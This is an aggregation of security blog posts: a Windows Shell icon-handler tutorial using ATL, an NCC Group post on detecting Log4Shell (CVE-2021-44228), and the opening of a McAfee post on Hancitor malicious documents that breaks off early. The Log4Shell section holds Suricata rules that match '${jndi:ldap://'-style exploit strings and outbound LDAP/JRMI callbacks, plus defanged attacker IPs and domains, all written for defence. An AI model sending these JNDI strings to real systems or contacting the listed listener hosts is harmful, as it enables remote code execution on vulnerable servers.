[xii] Togbe, M.U., Chabchoub, Y., Boly, A., Barry, M., Chiky, R., & Bahri, M. (2021). “Anomalies Detection Using Isolation in Concept-Drifting Data Streams.” Comput., 10, 13.
https://www.mdpi.com/2073-431X/10/1/13

[xiii] Tan, S. Ting, K. & Liu, F. (2011). “Fast Anomaly Detection for Streaming Data.” 1511-1516. 10.5591/978-1-57735-516-8/IJCAI11-254.
https://www.ijcai.org/Proceedings/11/Papers/254.pdf

Icon Handler with ATL

11 December 2021 at 11:32

One of the exercises I gave at the recent COM Programming class was to build an Icon Handler that integrates with the Windows Shell, where DLLs should have an icon based on their “bitness” – whether they’re 64-bit or 32-bit Portable Executable (PE).

The Shell provides many opportunities for extensibility. An Icon Handler is one of the simplest, but still requires writing a full-fledged COM component that implements certain interfaces that the shell expects. Here is the result of using the Icon Handler DLL, showing the folders c:\Windows\System32 and c:\Windows\SysWow64 (large icons for easier visibility).

C:\Windows\System32
C:\Windows\SysWow64

Let’s see how to build such an icon handler. The full code is at zodiacon/DllIconHandler.

The first step is to create a new ATL project in Visual Studio. I’ll be using Visual Studio 2022, but any recent version would work essentially the same way (e.g. VS 2019, or 2017). Locate the ATL project type by searching in the terrible new project dialog introduced in VS 2019 and still horrible in VS 2022.

ATL (Active Template Library) is certainly not the only way to build COM components. “Pure” C++ would work as well, but ATL provides all the COM boilerplate such as the required exported functions, class factories, IUnknown implementations, etc. Since ATL is fairly “old”, it lacks the elegance of other libraries such as WRL and WinRT, as it doesn’t take advantage of C++11 and later features. Still, ATL has withstood the test of time, is robust, and full featured when it comes to COM, something I can’t say for these other alternatives.

If you can’t locate the ATL project, you may not have ATL installed propertly. Make sure the C++ Desktop development workload is installed using the Visual Studio Installer.

Click Next and select a project name and location:

Click Create to launch the ATL project wizard. Leave all defaults (Dynamic Link Library) and click OK. Shell extensions of all kinds must be DLLs, as these are loaded by Explorer.exe. It’s not ideal in terms of Explorer’s stability, as aun unhandled exception can bring down the entire process, but this is necessary to get good performance, as no inter-process calls are made.

Two projects are created, named DllIconHandler and DllIconHandlerPS. The latter is a proxy/stub DLL that maybe useful if cross-apartment COM calls are made. This is not needed for shell extensions, so the PS project should simply be removed from the solution.


A detailed discussion of COM is way beyond the scope of this post.


The remaining project contains the COM DLL required code, such as the mandatory exported function, DllGetClassObject, and the other optional but recommended exports (DllRegisterServer, DllUnregisterServer, DllCanUnloadNow and DllInstall). This is one of the nice benefits of working with ATL project for COM component development: all the COM boilerplate is implemented by ATL.

The next step is to add a COM class that will implement our icon handler. Again, we’ll turn to a wizard provided by Visual Studio that provides the fundamentals. Right-click the project and select Add Item… (don’t select Add Class as it’s not good enough). Select the ATL node on the left and ATL Simple Object on the right. Set the name to something like IconHandler:

Click Add. The ATL New Object wizard opens up. The name typed in the Add New Item dialog is used as a basis for generating names for source code elements (like the C++ class) and COM elements (that would be written into the IDL file and the resulting type library). Since we’re not going to define a new interface (we need to implement explorer-defined interfaces), there is no real need to tweak anything. You can click Finish to generate the class.

Three files are added with this last step: IconHandler.h, IconHandler.cpp and IconHandler.rgs. The C++ source files role is obvious – implementing the Icon Handler. The rgs file contains a script in an ATL-provided “language” indicating what information to write to the Registry when this DLL is registered (and what to remove if it’s unregistered).

The IDL (Interface Definition Language) file has also been modified, adding the definitions of the wizard generated interface (which we don’t need) and the coclass. We’ll leave the IDL alone, as we do need it to generate the type library of our component because the ATL registration code uses it internally.

If you look in IconHandler.h, you’ll see that the class implements the IIconHandler empty interface generated by the wizard that we don’t need. It even derives from IDispatch:

class ATL_NO_VTABLE CIconHandler :
	public CComObjectRootEx<CComSingleThreadModel>,
	public CComCoClass<CIconHandler, &CLSID_IconHandler>,
	public IDispatchImpl<IIconHandler, &IID_IIconHandler, &LIBID_DLLIconHandlerLib, /*wMajor =*/ 1, /*wMinor =*/ 0> {

We can leave the IDispatchImpl-inheritance, since it’s harmless. But it’s useless as well, so let’s delete it and also delete the interfaces IIconHandler and IDispatch from the interface map located further down:

class ATL_NO_VTABLE CIconHandler :
	public CComObjectRootEx<CComSingleThreadModel>,
	public CComCoClass<CIconHandler, &CLSID_IconHandler> {
public:
	BEGIN_COM_MAP(CIconHandler)
	END_COM_MAP()

(I have rearranged the code a bit). Now we need to add the interfaces we truly have to implement for an icon handler: IPersistFile and IExtractIcon. To get their definitions, we’ll add an #include for <shlobj_core.h> (this is documented in MSDN). We add the interfaces to the inheritance hierarchy, the COM interface map, and use the Visual Studio feature to add the interface members for us by right-clicking the class name (CIconHandler), pressing Ctrl+. (dot) and selecting Implement all pure virtuals of CIconHandler. The resulting class header looks something like this (some parts omitted for clarity) (I have removed the virtual keyword as it’s inherited and doesn’t have to be specified in derived types):

class ATL_NO_VTABLE CIconHandler :
	public CComObjectRootEx<CComSingleThreadModel>,
	public CComCoClass<CIconHandler, &CLSID_IconHandler>,
	public IPersistFile,
	public IExtractIcon {
public:
	BEGIN_COM_MAP(CIconHandler)
		COM_INTERFACE_ENTRY(IPersistFile)
		COM_INTERFACE_ENTRY(IExtractIcon)
	END_COM_MAP()

//...
	// Inherited via IPersistFile
	HRESULT __stdcall GetClassID(CLSID* pClassID) override;
	HRESULT __stdcall IsDirty(void) override;
	HRESULT __stdcall Load(LPCOLESTR pszFileName, DWORD dwMode) override;
	HRESULT __stdcall Save(LPCOLESTR pszFileName, BOOL fRemember) override;
	HRESULT __stdcall SaveCompleted(LPCOLESTR pszFileName) override;
	HRESULT __stdcall GetCurFile(LPOLESTR* ppszFileName) override;

	// Inherited via IExtractIconW
	HRESULT __stdcall GetIconLocation(UINT uFlags, PWSTR pszIconFile, UINT cchMax, int* piIndex, UINT* pwFlags) override;
	HRESULT __stdcall Extract(PCWSTR pszFile, UINT nIconIndex, HICON* phiconLarge, HICON* phiconSmall, UINT nIconSize) override;
};

Now for the implementation. The IPersistFile interface seems non-trivial, but fortunately we just need to implement the Load method for an icon handler. This is where we get the file name we need to inspect. To check whether a DLL is 64 or 32 bit, we’ll add a simple enumeration and a helper function to the CIconHandler class:

	enum class ModuleBitness {
		Unknown,
		Bit32,
		Bit64
	};
	static ModuleBitness GetModuleBitness(PCWSTR path);

The implementation of IPersistFile::Load looks something like this:

HRESULT __stdcall CIconHandler::Load(LPCOLESTR pszFileName, DWORD dwMode) {
    ATLTRACE(L"CIconHandler::Load %s\n", pszFileName);

    m_Bitness = GetModuleBitness(pszFileName);
    return S_OK;
}

The method receives the full path of the DLL we need to examine. How do we know that only DLL files will be delivered? This has to do with the registration we’ll make for the icon handler. We’ll register it for DLL file extensions only, so that other file types will not be provided. Calling GetModuleBitness (shown later) performs the real work of determining the DLL’s bitness and stores the result in m_Bitness (a data member of type ModuleBitness).

All that’s left to do is tell explorer which icon to use. This is the role of IExtractIcon. The Extract method can be used to provide an icon handle directly, which is useful if the icon is “dynamic” – perhaps generated by different means in each case. In this example, we just need to return one of two icons which have been added as resources to the project (you can find those in the project source code. This is also an opportunity to provide your own icons).

For our case, it’s enough to return S_FALSE from Extract that causes explorer to use the information returned from GetIconLocation. Here is its implementation:

HRESULT __stdcall CIconHandler::GetIconLocation(UINT uFlags, PWSTR pszIconFile, UINT cchMax, int* piIndex, UINT* pwFlags) {
    if (s_ModulePath[0] == 0) {
        ::GetModuleFileName(_AtlBaseModule.GetModuleInstance(), 
            s_ModulePath, _countof(s_ModulePath));
        ATLTRACE(L"Module path: %s\n", s_ModulePath);
    }
    if (s_ModulePath[0] == 0)
        return S_FALSE;

    if (m_Bitness == ModuleBitness::Unknown)
        return S_FALSE;

    wcscpy_s(pszIconFile, wcslen(s_ModulePath) + 1, s_ModulePath);
    ATLTRACE(L"CIconHandler::GetIconLocation: %s bitness: %d\n", 
        pszIconFile, m_Bitness);
    *piIndex = m_Bitness == ModuleBitness::Bit32 ? 0 : 1;
    *pwFlags = GIL_PERINSTANCE;

    return S_OK;
}

The method’s purpose is to return the current (our icon handler DLL) module’s path and the icon index to use. This information is enough for explorer to load the icon itself from the resources. First, we get the module path to where our DLL has been installed. Since this doesn’t change, it’s only retrieved once (with GetModuleFileName) and stored in a static variable (s_ModulePath).

If this fails (unlikely) or the bitness could not be determined (maybe the file was not a PE at all, but just had such an extension), then we return S_FALSE. This tells explorer to use the default icon for the file type (DLL). Otherwise, we store 0 or 1 in piIndex, based on the IDs of the icons (0 corresponds to the lower of the IDs).

Finally, we need to set a flag inside pwFlags to indicate to explorer that this icon extraction is required for every file (GIL_PERINSTANCE). Otherwise, explorer calls IExtractIcon just once for any DLL file, which is the opposite of what we want.

The final piece of the puzzle (in terms of code) is how to determine whether a PE is 64 or 32 bit. This is not the point of this post, as any custom algorithm can be used to provide different icons for different files of the same type. For completeness, here is the code with comments:

CIconHandler::ModuleBitness CIconHandler::GetModuleBitness(PCWSTR path) {
    auto bitness = ModuleBitness::Unknown;
    //
    // open the DLL as a data file
    //
    auto hFile = ::CreateFile(path, GENERIC_READ, FILE_SHARE_READ, 
        nullptr, OPEN_EXISTING, 0, nullptr);
    if (hFile == INVALID_HANDLE_VALUE)
        return bitness;

    //
    // create a memory mapped file to read the PE header
    //
    auto hMemMap = ::CreateFileMapping(hFile, nullptr, PAGE_READONLY, 0, 0, nullptr);
    ::CloseHandle(hFile);
    if (!hMemMap)
        return bitness;

    //
    // map the first page (where the header is located)
    //
    auto p = ::MapViewOfFile(hMemMap, FILE_MAP_READ, 0, 0, 1 << 12);
    if (p) {
        auto header = ::ImageNtHeader(p);
        if (header) {
            auto machine = header->FileHeader.Machine;
            bitness = header->Signature == IMAGE_NT_OPTIONAL_HDR64_MAGIC ||
                machine == IMAGE_FILE_MACHINE_AMD64 || machine == IMAGE_FILE_MACHINE_ARM64 ?
                ModuleBitness::Bit64 : ModuleBitness::Bit32;
        }
        ::UnmapViewOfFile(p);
    }
    ::CloseHandle(hMemMap);
    
    return bitness;
}

To make all this work, there is still one more concern: registration. Normal COM registration is necessary (so that the call to CoCreateInstance issued by explorer has a chance to succeed), but not enough. Another registration is needed to let explorer know that this icon handler exists, and is to be used for files with the extension “DLL”.

Fortunately, ATL provides a convenient mechanism to add Registry settings using a simple script-like configuration, which does not require any code. The added keys/values have been placed in DllIconHandler.rgs like so:

HKCR
{
	NoRemove DllFile
	{
		NoRemove ShellEx
		{
			IconHandler = s '{d913f592-08f1-418a-9428-cc33db97ed60}'
		}
	}
}

This sets an icon handler in HKEY_CLASSES_ROOT\DllFile\ShellEx, where the IconHandler value specifies the CLSID of our component. You can find the CLSID in the IDL file where the coclass element is defined:

[
	uuid(d913f592-08f1-418a-9428-cc33db97ed60)
]
coclass IconHandler {

Replace your own CLSID if you’re building this project from scratch. Registration itself is done with the RegSvr32 built-in tool. With an ATL project, a successful build also causes RegSvr32 to be invoked on the resulting DLL, thus performing registration. The default behavior is to register in HKEY_CLASSES_ROOT which uses HKEY_LOCAL_MACHINE behind the covers. This requires running Visual Studio elevated (or an elevated command window if called from outside VS). It will register the icon handler for all users on the machine. If you prefer to register for the current user only (which uses HKEY_CURRENT_USER and does not require running elevated), you can set the per-user registration in VS by going to project properties, clinking on the Linker element and setting per-user redirection:

If you’re registering from outside VS, the per-user registration is achieved with:

regsvr32 /n /i:user <dllpath>

This is it! The full source code is available here.

image-2

zodiacon

Log4Shell: Reconnaissance and post exploitation network detection

12 December 2021 at 19:16

Note: This blogpost will be live-updated with new information. NCC Group’s RIFT is intending to publish PCAPs of different exploitation methods in the near future – last updated December 14th at 13:00 UTC

About the Research and Intelligence Fusion Team (RIFT): RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

In the wake of the CVE-2021-44228 (a.k.a. Log4Shell) vulnerability publication, NCC Group’s RIFT immediately started investigating the vulnerability in order to improve detection and response capabilities mitigating the threat. This blog post is focused on detection and threat hunting, although attack surface scanning and identification are also quintessential parts of a holistic response. Multiple references for prevention and mitigation can be found included at the end of this post.

This blogpost provides Suricata network detection rules that can be used not only to detect exploitation attempts, but also indications of successful exploitation. In addition, a list of indicators of compromise (IOC’s) are provided. These IOC’s have been observed listening for incoming connections and are thus a useful for threat hunting.

Update Wednesday December 15th, 17:30 UTC

We have seen 5 instances in our client base of active exploitation of Mobile Iron during the course of yesterday and today.

Our working hypothesis is that this is a derivative of the details shared yesterday – https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads/blob/main/MobileIron.

The scale of the exposure globally appears significant.

We recommend all Mobile Iron users updated immediately.

Ivanti informed us that communication was sent over the weekend to MobileIron Core customers. Ivanti has provided mitigation steps of the exploit listed below on their Knowledge Base. Both NCC Group and Ivanti recommend all customers immediately apply the mitigation within to ensure their environment is protected.

Update Tuesday December 14th, 13:00 UTC

Log4j-finder: finding vulnerable versions of Log4j on your systems

RIFT has published a Python 3 script that can be run on endpoints to check for the presence of vulnerable versions of Log4j. The script requires no dependencies and supports recursively checking the filesystem and inside JAR files to see if they contain a vulnerable version of Log4j. This script can be of great value in determining which systems are vulnerable, and where this vulnerability stems from. The script will be kept up to date with ongoing developments.

It is strongly recommended to run host based scans for vulnerable Log4j versions. Whereas network-based scans attempt to identify vulnerable Log4j versions by attacking common entry points, a host-based scan can find Log4j in unexpected or previously unknown places.

The script can be found on GitHub: https://github.com/fox-it/log4j-finder

JNDI ExploitKit exposes larger attack surface

As shown by the release of an update JNDI ExploitKIT  it is possible to reach remote code execution through serialized payloads instead of referencing a Java .class object in LDAP and subsequently serving that to the vulnerable system. While TrustURLCodebase defaults to false in newer Java versions (6u211, 7u201, 8u191, and 11.0.1) and therefore prevents the LDAP reference vector,depending on the loaded libraries in the vulnerable application it is possible to execute code through Java serialization via both rmi and ldap.

Beware: Centralized logging can result in indirect compromise

This is also highly relevant for organisations using a form of centralised logging. Centralised logging can be used to collect and parse the received logs from the different services and applications running in the environment. We have identified cases where a Kibana server was not exposed to the Internet but because it received logs from several appliances it still got hit by the Log4Shell RCE and started to retrieve Java objects via LDAP.

We were unable to determine if this was due to Logstash being used in the background for parsing the received logs, but this stipulates the importance of checking systems configured with centralised logging solutions for vulnerable versions of Log4j, and not rely on the protection of newer JDK versions that has com.sun.jndi.ldap.object.trustURLCodebase
com.sun.jndi.rmi.object.trustURLCodebase set to false by default.

A warning concerning possible post-exploitation

Although largely eclipsed by Log4Shell, last weekend also saw the emergence of details concerning two vulnerabilities (CVE-2021-42287 and CVE-2021-42278) that reside in the Active Directory component of Microsoft Windows Server editions. Due to the nature of these vulnerabilities, an attackers could escalate their privileges in a relatively easy manner as these vulnerabilities have already been weaponised.

It is therefore advised to apply the patches provided by Microsoft in the November 2021 security updates to every domain controller that is residing in the network as it is a possible form of post-exploitation after Log4Shell were to be successfully exploited.

Background

Since Log4J is used by many solutions there are significant challenges in finding vulnerable systems and any potential compromise resulting from exploitation of the vulnerability. JNDI (Java Naming and Directory Interface™) was designed to allow distributed applications to look up services in a resource-independent manner, and this is exactly where the bug resulting in exploitation resides. The nature of JNDI allows for defense-evading exploitation attempts that are harder to detect through signatures. An additional problem is the tremendous amount of scanning activity that is currently ongoing. Because of this, investigating every single exploitation attempt is in most situations unfeasible. This means that distinguishing scanning attempts from actual successful exploitation is crucial.

In order to provide detection coverage for CVE-2021-44228, NCC Group’s RIFT first created a ruleset that covers as many as possible ways of attempted exploitation of the vulnerability. This initial coverage allowed the collection of Threat Intelligence for further investigation. Most adversaries appear to use a different IP to scan for the vulnerability than they do for listening for incoming victim machines. IOC’s for listening IP’s / domains are more valuable than those of scanning IP’s. After all a connection from an environment to a known listening IP might indicate a successful compromise, whereas a connection to a scanning IP might merely mean that it has been scanned.

After establishing this initial coverage, our focus shifted to detecting successful exploitation in real time. This can be done by monitoring for rogue JRMI or LDAP requests to external servers. Preferably, this sort of behavior is detected in a port-agnostic way as attackers may choose arbitrary ports to listen on. Moreover, currently a full RCE chain requires the victim machine to retrieve a Java class file from a remote server (caveat: unless exfiltrating sensitive environment variables). For hunting purposes we are able to hunt for inbound Java classes. However, if coverage exists for incoming attacks we are also able to alert on an inbound Java class in a short period of time after an exploitation attempt. The combination of inbound exploitation attempt and inbound Java class is a high confidence IOC that a successful connection has occurred.

This blogpost will continue twofold: we will first provide a set of suricata rules that can be used for:

  1. Detecting incoming exploitation attempts;
  2. Alerting on higher confidence indicators that successful exploitation has occurred;
  3. Generating alerts that can be used for hunting

After providing these detection rules, a list of IOC’s is provided.

Detection Rules

Some of these rules are redundant, as they’ve been written in rapid succession.

# Detects Log4j exploitation attempts
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:ldap://"; fast_pattern:only; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003726; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; pcre:"/\$\{jndi\:(rmi|ldaps|dns)\:/"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003728; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; content:!"ldap://"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, twitter.com/stereotype32/status/1469313856229228544; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003730; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (URL encoded bracket) (CVE-2021-44228)"; flow:established, to_server; content:"%7bjndi:"; nocase; fast_pattern; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003731; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header"; flow:established, to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; flowbits:set, fox.apachelog4j.rce.loose; classtype:web-application-attack; priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003732; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI"; flow:established,to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; flowbits:set, fox.apachelog4j.rce.loose; classtype:web-application-attack; priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003733; rev:1;)
# Better and stricter rules, also detects evasion techniques
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header (strict)"; flow:established,to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Hi; xbits:set, fox.log4shell.attempt, track ip_dst, expire 1; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003734; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI (strict)"; flow:established, to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Ui; xbits:set, fox.log4shell.attempt, track ip_dst, expire 1; classtype:web-application-attack; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003735; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in Client Body (strict)"; flow:to_server; content:"${"; http_client_body; fast_pattern; content:"}"; http_client_body; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Pi; flowbits:set, fox.apachelog4j.rce.strict; xbits:set,fox.log4shell.attempt,track ip_dst,expire 1; classtype:web-application-attack; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-12; metadata:ids suricata; priority:3; sid:21003744; rev:1;)

Detecting outbound connections to probing services

Connections to outbound probing services could indicate a system in your network has been scanned and subsequently connected back to a listening service. This could indicate that a system in your network is/was vulnerable and has been scanned.

# Possible successful interactsh probe
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"FOX-SRT – Webattack – Possible successful InteractSh probe observed"; flow:established, to_client; content:"200"; http_stat_code; content:"<html><head></head><body>"; http_server_body; fast_pattern; pcre:"/[a-z0-9]{30,36}<\/body><\/html>/QR"; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:misc-attack; reference:url, github.com/projectdiscovery/interactsh; metadata:created_at 2021-12-05; metadata:ids suricata; priority:2; sid:21003712; rev:1;)
alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT – Suspicious – DNS query for interactsh.com server observed"; flow:stateless; dns_query; content:".interactsh.com"; fast_pattern; pcre:"/[a-z0-9]{30,36}\.interactsh\.com/"; threshold:type limit, track by_src, count 1, seconds 3600; reference:url, github.com/projectdiscovery/interactsh; classtype:bad-unknown; metadata:created_at 2021-12-05; metadata:ids suricata; priority:2; sid:21003713; rev:1;)
# Detecting DNS queries for dnslog[.]cn
alert dns any any -> any 53 (msg:"FOX-SRT – Suspicious – dnslog.cn DNS Query Observed"; flow:stateless; dns_query; content:"dnslog.cn"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-12-10; metadata:ids suricata; priority:2; sid:21003729; rev:1;)
# Connections to requestbin.net
alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT – Suspicious – requestbin.net DNS Query Observed"; flow:stateless; dns_query; content:"requestbin.net"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-11-23; metadata:ids suricata; sid:21003685; rev:1;)
alert tls $HOME_NET any -> $EXTERNAL_NET 443 (msg:"FOX-SRT – Suspicious – requestbin.net in SNI Observed"; flow:established, to_server; tls_sni; content:"requestbin.net"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-11-23; metadata:ids suricata; sid:21003686; rev:1;)

Detecting possible successful exploitation

Outbound LDAP(S) / RMI connections are highly uncommon but can be caused by successful exploitation. Inbound Java can be suspicious, especially if it is shortly after an exploitation attempt.

# Detects possible successful exploitation of Log4j
# JNDI LDAP/RMI Request to External
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Exploit – Possible Rogue JNDI LDAP Bind to External Observed (CVE-2021-44228)"; flow:established, to_server; dsize:14; content:"|02 01 03 04 00 80 00|"; offset:7; isdataat:!1, relative; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; priority:1; metadata:created_at 2021-12-11; sid:21003738; rev:2;)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Exploit – Possible Rogue JRMI Request to External Observed (CVE-2021-44228)"; flow:established, to_server; content:"JRMI"; depth:4; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; priority:1; reference:url, https://docs.oracle.com/javase/9/docs/specs/rmi/protocol.html; metadata:created_at 2021-12-11; sid:21003739; rev:1;)
# Detecting inbound java shortly after exploitation attempt
alert tcp any any -> $HOME_NET any (msg: "FOX-SRT – Exploit – Java class inbound after CVE-2021-44228 exploit attempt (xbit)"; flow:established, to_client; content: "|CA FE BA BE 00 00 00|"; depth:40; fast_pattern; xbits:isset, fox.log4shell.attempt, track ip_dst; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:successful-user; priority:1; metadata:ids suricata; metadata:created_at 2021-12-12; sid:21003741; rev:1;)

Hunting rules (can yield false positives)

Wget and cURL to external hosts was observed to be used by an actor for post-exploitation. As cURL and Wget are also used legitimately, these rules should be used for hunting purposes. Also note that attackers can easily change the User-Agent but we have not seen that in the wild yet. Outgoing connections after Log4j exploitation attempts can be tracked to be later hunted on although this rule can generate false positives if victim machine makes outgoing connections regularly. Lastly, detecting inbound compiled Java classes can also be used for hunting.

# Outgoing connection after Log4j Exploit Attempt (uses xbit from sid: 21003734) – requires `stream.inline=yes` setting in suricata.yaml for this to work
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Suspicious – Possible outgoing connection after Log4j Exploit Attempt"; flow:established, to_server; xbits:isset, fox.log4shell.attempt, track ip_src; stream_size:client, =, 1; stream_size:server, =, 1; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:bad-unknown; metadata:ids suricata; metadata:created_at 2021-12-12; priority:3; sid:21003740; rev:1;)
# Detects inbound Java class
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "FOX-SRT – Suspicious – Java class inbound"; flow:established, to_client; content: "|CA FE BA BE 00 00 00|"; depth:20; fast_pattern; threshold:type limit, track by_dst, count 1, seconds 43200; metadata:ids suricata; metadata:created_at 2021-12-12; classtype:bad-unknown; priority:3; sid:21003742; rev:2;)

Indicators of Compromise

This list contains Domains and IP’s that have been observed to listen for incoming connections. Unfortunately, some adversaries scan and listen from the same IP, generating a lot of noise that can make threat hunting more difficult. Moreover, as security researchers are scanning the internet for the vulnerability as well, it could be possible that an IP or domain is listed here even though it is only listening for benign purposes.

# IP addresses and domains that have been observed in Log4j exploit attempts
134[.]209[.]26[.]39
199[.]217[.]117[.]92
pwn[.]af
188[.]120[.]246[.]215
kryptoslogic-cve-2021-44228[.]com
nijat[.]space
45[.]33[.]47[.]240
31[.]6[.]19[.]41
205[.]185[.]115[.]217
log4j[.]kingudo[.]de
101[.]43[.]40[.]206
psc4fuel[.]com
185[.]162[.]251[.]208
137[.]184[.]61[.]190
162[.]33[.]177[.]73
34[.]125[.]76[.]237
162[.]255[.]202[.]246
5[.]22[.]208[.]77
45[.]155[.]205[.]233
165[.]22[.]213[.]147
172[.]111[.]48[.]30
133[.]130[.]120[.]176
213[.]156[.]18[.]247
m3[.]wtf
poc[.]brzozowski[.]io
206[.]188[.]196[.]219
185[.]250[.]148[.]157
132[.]226[.]170[.]154
flofire[.]de
45[.]130[.]229[.]168
c19s[.]net
194[.]195[.]118[.]221
awsdns-2[.]org
2[.]56[.]57[.]208
158[.]69[.]204[.]95
45[.]130[.]229[.]168
163[.]172[.]157[.]143
45[.]137[.]21[.]9
bingsearchlib[.]com
45[.]83[.]193[.]150
165[.]227[.]93[.]231
yourdns[.]zone[.]here
eg0[.]ru
dataastatistics[.]com
log4j-test[.]xyz
79[.]172[.]214[.]11
152[.]89[.]239[.]12
67[.]205[.]191[.]102
ds[.]Rce[.]ee
38[.]143[.]9[.]76
31[.]191[.]84[.]199
143[.]198[.]237[.]19

# (Ab)use of listener-as-a-service domains.
# These domains can be false positive heavy, especially if these services are used legitimately within your network.
interactsh[.]com
interact[.]sh
burpcollaborator[.]net
requestbin[.]net
dnslog[.]cn
canarytokens[.]com

# This IP is both a listener and a scanner at the same time. Threat hunting for this IOC thus requires additional steps.
45[.]155[.]205[.]233
194[.]151[.]29[.]154
158[.]69[.]204[.]95
47[.]254[.]127[.]78

References

General references

Mitigation:

Attack surface:

Known vulnerable services / products which use log4j:

Hashes of vulnerable products (beware, 2.15 of Log4J is included):

HANCITOR DOC drops via CLIPBOARD

13 December 2021 at 14:32

By Sriram P & Lakshya Mathur 

Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware, and many more. Recently at McAfee Labs, we observed Hancitor Doc VBA (Visual Basic for Applications) samples dropping the payload using the Windows clipboard through Selection.Copy method. 

This blog focuses on the effectiveness of this newly observed technique and how it adds an extra layer of obfuscation to evade detection. 

Below (Figure 1) is the Geolocation based stats of Hancitor Malicious Doc observed by McAfee since September 2021 

Figure 1 – Geo stats of Hancitor MalDoc
Figure 1 – Geo stats of Hancitor MalDoc

INFECTION CHAIN

  1. The victim will receive a Docusign-based phishing email.
